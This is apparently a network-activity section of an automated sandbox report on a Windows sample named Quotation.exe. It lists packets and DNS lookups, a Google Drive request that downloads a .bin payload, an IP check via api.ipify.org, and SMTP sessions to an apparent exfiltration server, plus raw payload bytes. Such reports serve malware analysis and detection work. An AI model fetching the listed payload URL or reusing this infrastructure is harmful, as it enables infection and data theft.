Nov 11, 2024 11:50:10.586604118 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.586611986 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.586617947 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.586653948 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.587244987 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.587295055 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.587342978 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.587351084 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.587389946 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.587764978 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.589865923 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.589900017 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.589915037 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.589922905 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.589939117 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.589958906 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.591917992 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.594027042 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.594054937 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.594079018 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.594088078 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.594105959 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.594130039 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.596385956 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.598026991 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.598054886 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.598087072 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.598115921 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.598129034 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.599452019 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.600048065 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.602340937 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.602371931 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.602396011 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.602407932 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.602432013 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.602441072 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.603861094 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.606034994 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.606065035 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.606091976 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.606105089 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.606129885 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.606142998 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.607862949 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.609960079 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.610018969 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.610045910 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.610055923 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.610115051 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.611605883 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.613507986 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.613543987 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.613575935 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.613590956 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.613600016 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.613676071 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.615555048 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.617208958 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.617273092 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.617280960 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.617295980 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.617340088 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.618946075 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.619067907 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.619074106 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.619115114 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.620934010 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.622633934 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.622642040 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.622683048 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.622688055 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.622737885 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.622742891 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.622773886 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.624753952 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.626091957 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.626147985 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.626156092 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.627542973 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.627549887 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.627599955 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.627852917 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.629726887 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.629800081 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.629801035 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.629813910 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.629853010 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.631433964 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.633045912 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.633135080 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.633143902 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.634839058 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.634895086 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.634902954 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.634912014 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.634965897 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.636533022 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.638083935 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.638139009 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.638148069 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.638185978 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.638190985 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.638205051 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.638242006 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.639729977 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.641508102 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.641563892 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.641578913 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.641587973 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.641602993 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.641625881 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.643199921 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.643260956 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.666758060 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.666882038 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.666934967 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.666982889 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.666996002 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.667005062 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.667038918 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.667061090 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.667064905 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.667109013 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.667149067 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.667152882 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.667162895 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.667208910 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.667213917 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.667247057 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.667251110 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.667741060 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.667783022 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.667788982 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.667838097 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.667880058 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.667885065 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.667923927 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.667927980 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.668447018 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.668493986 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.668495893 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.668509960 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.668566942 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.668570995 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.668617964 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.668622017 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.668679953 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.668729067 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.668735981 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.668740988 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.668787003 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.668787003 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.669125080 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.669203043 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.669250965 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.669250965 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.669262886 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.669302940 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.669307947 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.669518948 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.669523001 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.673458099 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.704982996 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:10.705056906 CET	443	49877	172.217.18.1	192.168.2.9
Nov 11, 2024 11:50:10.705125093 CET	49877	443	192.168.2.9	172.217.18.1
Nov 11, 2024 11:50:11.342868090 CET	49908	443	192.168.2.9	172.67.74.152
Nov 11, 2024 11:50:11.342919111 CET	443	49908	172.67.74.152	192.168.2.9
Nov 11, 2024 11:50:11.343020916 CET	49908	443	192.168.2.9	172.67.74.152
Nov 11, 2024 11:50:11.347214937 CET	49908	443	192.168.2.9	172.67.74.152
Nov 11, 2024 11:50:11.347229004 CET	443	49908	172.67.74.152	192.168.2.9
Nov 11, 2024 11:50:11.777080059 CET	443	49908	172.67.74.152	192.168.2.9
Nov 11, 2024 11:50:11.777209044 CET	49908	443	192.168.2.9	172.67.74.152
Nov 11, 2024 11:50:11.779336929 CET	49908	443	192.168.2.9	172.67.74.152
Nov 11, 2024 11:50:11.779345989 CET	443	49908	172.67.74.152	192.168.2.9
Nov 11, 2024 11:50:11.779587030 CET	443	49908	172.67.74.152	192.168.2.9
Nov 11, 2024 11:50:11.783458948 CET	49908	443	192.168.2.9	172.67.74.152
Nov 11, 2024 11:50:11.831327915 CET	443	49908	172.67.74.152	192.168.2.9
Nov 11, 2024 11:50:11.880646944 CET	443	49908	172.67.74.152	192.168.2.9
Nov 11, 2024 11:50:11.880736113 CET	443	49908	172.67.74.152	192.168.2.9
Nov 11, 2024 11:50:11.880786896 CET	49908	443	192.168.2.9	172.67.74.152
Nov 11, 2024 11:50:11.887233973 CET	49908	443	192.168.2.9	172.67.74.152
Nov 11, 2024 11:50:13.505743027 CET	49929	587	192.168.2.9	67.23.226.139
Nov 11, 2024 11:50:13.510615110 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:13.510701895 CET	49929	587	192.168.2.9	67.23.226.139
Nov 11, 2024 11:50:14.159353018 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.159611940 CET	49929	587	192.168.2.9	67.23.226.139
Nov 11, 2024 11:50:14.164463043 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.284239054 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.284497976 CET	49929	587	192.168.2.9	67.23.226.139
Nov 11, 2024 11:50:14.290013075 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.411748886 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.412260056 CET	49929	587	192.168.2.9	67.23.226.139
Nov 11, 2024 11:50:14.417428970 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.553319931 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.553349972 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.553421021 CET	49929	587	192.168.2.9	67.23.226.139
Nov 11, 2024 11:50:14.554929972 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.554943085 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.554954052 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.554977894 CET	49929	587	192.168.2.9	67.23.226.139
Nov 11, 2024 11:50:14.569202900 CET	49929	587	192.168.2.9	67.23.226.139
Nov 11, 2024 11:50:14.575691938 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.703959942 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.711230993 CET	49929	587	192.168.2.9	67.23.226.139
Nov 11, 2024 11:50:14.716037035 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.836177111 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.837192059 CET	49929	587	192.168.2.9	67.23.226.139
Nov 11, 2024 11:50:14.841988087 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.977323055 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:14.978287935 CET	49929	587	192.168.2.9	67.23.226.139
Nov 11, 2024 11:50:14.983117104 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:17.420062065 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:17.420300961 CET	49929	587	192.168.2.9	67.23.226.139
Nov 11, 2024 11:50:17.425052881 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:17.544123888 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:17.559551954 CET	49929	587	192.168.2.9	67.23.226.139
Nov 11, 2024 11:50:17.564712048 CET	587	49929	67.23.226.139	192.168.2.9
Nov 11, 2024 11:50:17.564788103 CET	49929	587	192.168.2.9	67.23.226.139

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2024 11:50:06.141904116 CET	52907	53	192.168.2.9	1.1.1.1
Nov 11, 2024 11:50:06.148865938 CET	53	52907	1.1.1.1	192.168.2.9
Nov 11, 2024 11:50:07.176489115 CET	55888	53	192.168.2.9	1.1.1.1
Nov 11, 2024 11:50:07.183182001 CET	53	55888	1.1.1.1	192.168.2.9
Nov 11, 2024 11:50:11.313091040 CET	65249	53	192.168.2.9	1.1.1.1
Nov 11, 2024 11:50:11.337268114 CET	53	65249	1.1.1.1	192.168.2.9
Nov 11, 2024 11:50:12.748152018 CET	64400	53	192.168.2.9	1.1.1.1
Nov 11, 2024 11:50:13.504291058 CET	53	64400	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 11, 2024 11:50:06.141904116 CET	192.168.2.9	1.1.1.1	0x957b	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 11:50:07.176489115 CET	192.168.2.9	1.1.1.1	0xe15a	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 11:50:11.313091040 CET	192.168.2.9	1.1.1.1	0x50f8	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 11, 2024 11:50:12.748152018 CET	192.168.2.9	1.1.1.1	0x3da4	Standard query (0)	mail.showpiece.trillennium.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 11, 2024 11:50:06.148865938 CET	1.1.1.1	192.168.2.9	0x957b	No error (0)	drive.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Nov 11, 2024 11:50:07.183182001 CET	1.1.1.1	192.168.2.9	0xe15a	No error (0)	drive.usercontent.google.com		172.217.18.1	A (IP address)	IN (0x0001)	false
Nov 11, 2024 11:50:11.337268114 CET	1.1.1.1	192.168.2.9	0x50f8	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 11, 2024 11:50:11.337268114 CET	1.1.1.1	192.168.2.9	0x50f8	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 11, 2024 11:50:11.337268114 CET	1.1.1.1	192.168.2.9	0x50f8	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 11, 2024 11:50:13.504291058 CET	1.1.1.1	192.168.2.9	0x3da4	No error (0)	mail.showpiece.trillennium.biz	showpiece.trillennium.biz		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 11:50:13.504291058 CET	1.1.1.1	192.168.2.9	0x3da4	No error (0)	showpiece.trillennium.biz		67.23.226.139	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49868	142.250.186.78	443	4068	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 10:50:06 UTC	216	OUT	GET /uc?export=download&id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-11-11 10:50:07 UTC	1766	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 11 Nov 2024 10:50:07 GMT Location: https://drive.usercontent.google.com/download?id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-i7dHRI77imHZxYt8IxEVrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49877	172.217.18.1	443	4068	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 10:50:07 UTC	258	OUT	GET /download?id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-11-11 10:50:10 UTC	4929	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="tOeddgbBdkJdhfVWiAGiB87.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 240192 Last-Modified: Wed, 06 Nov 2024 22:26:18 GMT X-GUploader-UploadID: AHmUCY17qQFT9D4jg1ZiLrp2sW8EaW8dOYsT50HomGPCbKb_3QtT4ZCbKdbjYFuioaVqg4Tal-CfNWH8Ag Date: Mon, 11 Nov 2024 10:50:10 GMT Expires: Mon, 11 Nov 2024 10:50:10 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=Iz7rfQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-11 10:50:10 UTC	4929	IN	Data Raw: a1 36 1c 29 31 79 35 e5 5e 74 0b 49 99 30 92 09 11 84 49 92 82 7f e9 4d 66 6f 09 54 a0 df dd 03 57 92 02 48 01 55 03 18 b5 41 d7 ec 3e 71 e9 5f 9b f2 0c 5a 41 cf 0e c4 ef 3d 85 5a b7 cc ae ea 2c 6f a8 99 44 6c d0 d2 ca c5 a5 62 59 bb d2 89 81 c2 e1 65 99 55 da 49 dc 6a 6c 06 5f 6f a6 51 84 09 3b 82 c2 30 65 83 a7 60 c1 7f 44 b8 98 ed 0d 4d f1 8a 54 fc 06 84 f6 cf 1b 55 97 00 ab 8e cf 42 0a c6 ea 9b a9 0a 6c e5 d8 6d 15 ae a6 29 62 4d a8 c6 a4 9f ac df 0e 17 f5 5f 0f 68 bf 0d cd 1f 2f d2 a8 33 04 7a 0e 54 ff e9 5b ef dc 9b f7 91 85 b3 6c ff 2b d3 da 85 99 de 27 0f 41 4c 63 32 59 f8 b3 15 69 bb 0c 9d db f4 6f 45 4e 8d ce 0e cb e2 cd a7 4d c8 92 02 39 34 f8 f4 41 50 04 58 1e 8b 85 87 5d ee 64 3c d3 8c 21 16 d5 98 f4 73 0d c7 39 3f 10 38 74 e8 64 fa 41 0b b3 Data Ascii: 6)1y5^tI0IMfoTWHUA>q_ZA=Z,oDlbYeUIjl_oQ;0e`DMTUBlm)bM_h/3zT[l+'ALc2YioENM94APX]d<!s9?8tdA
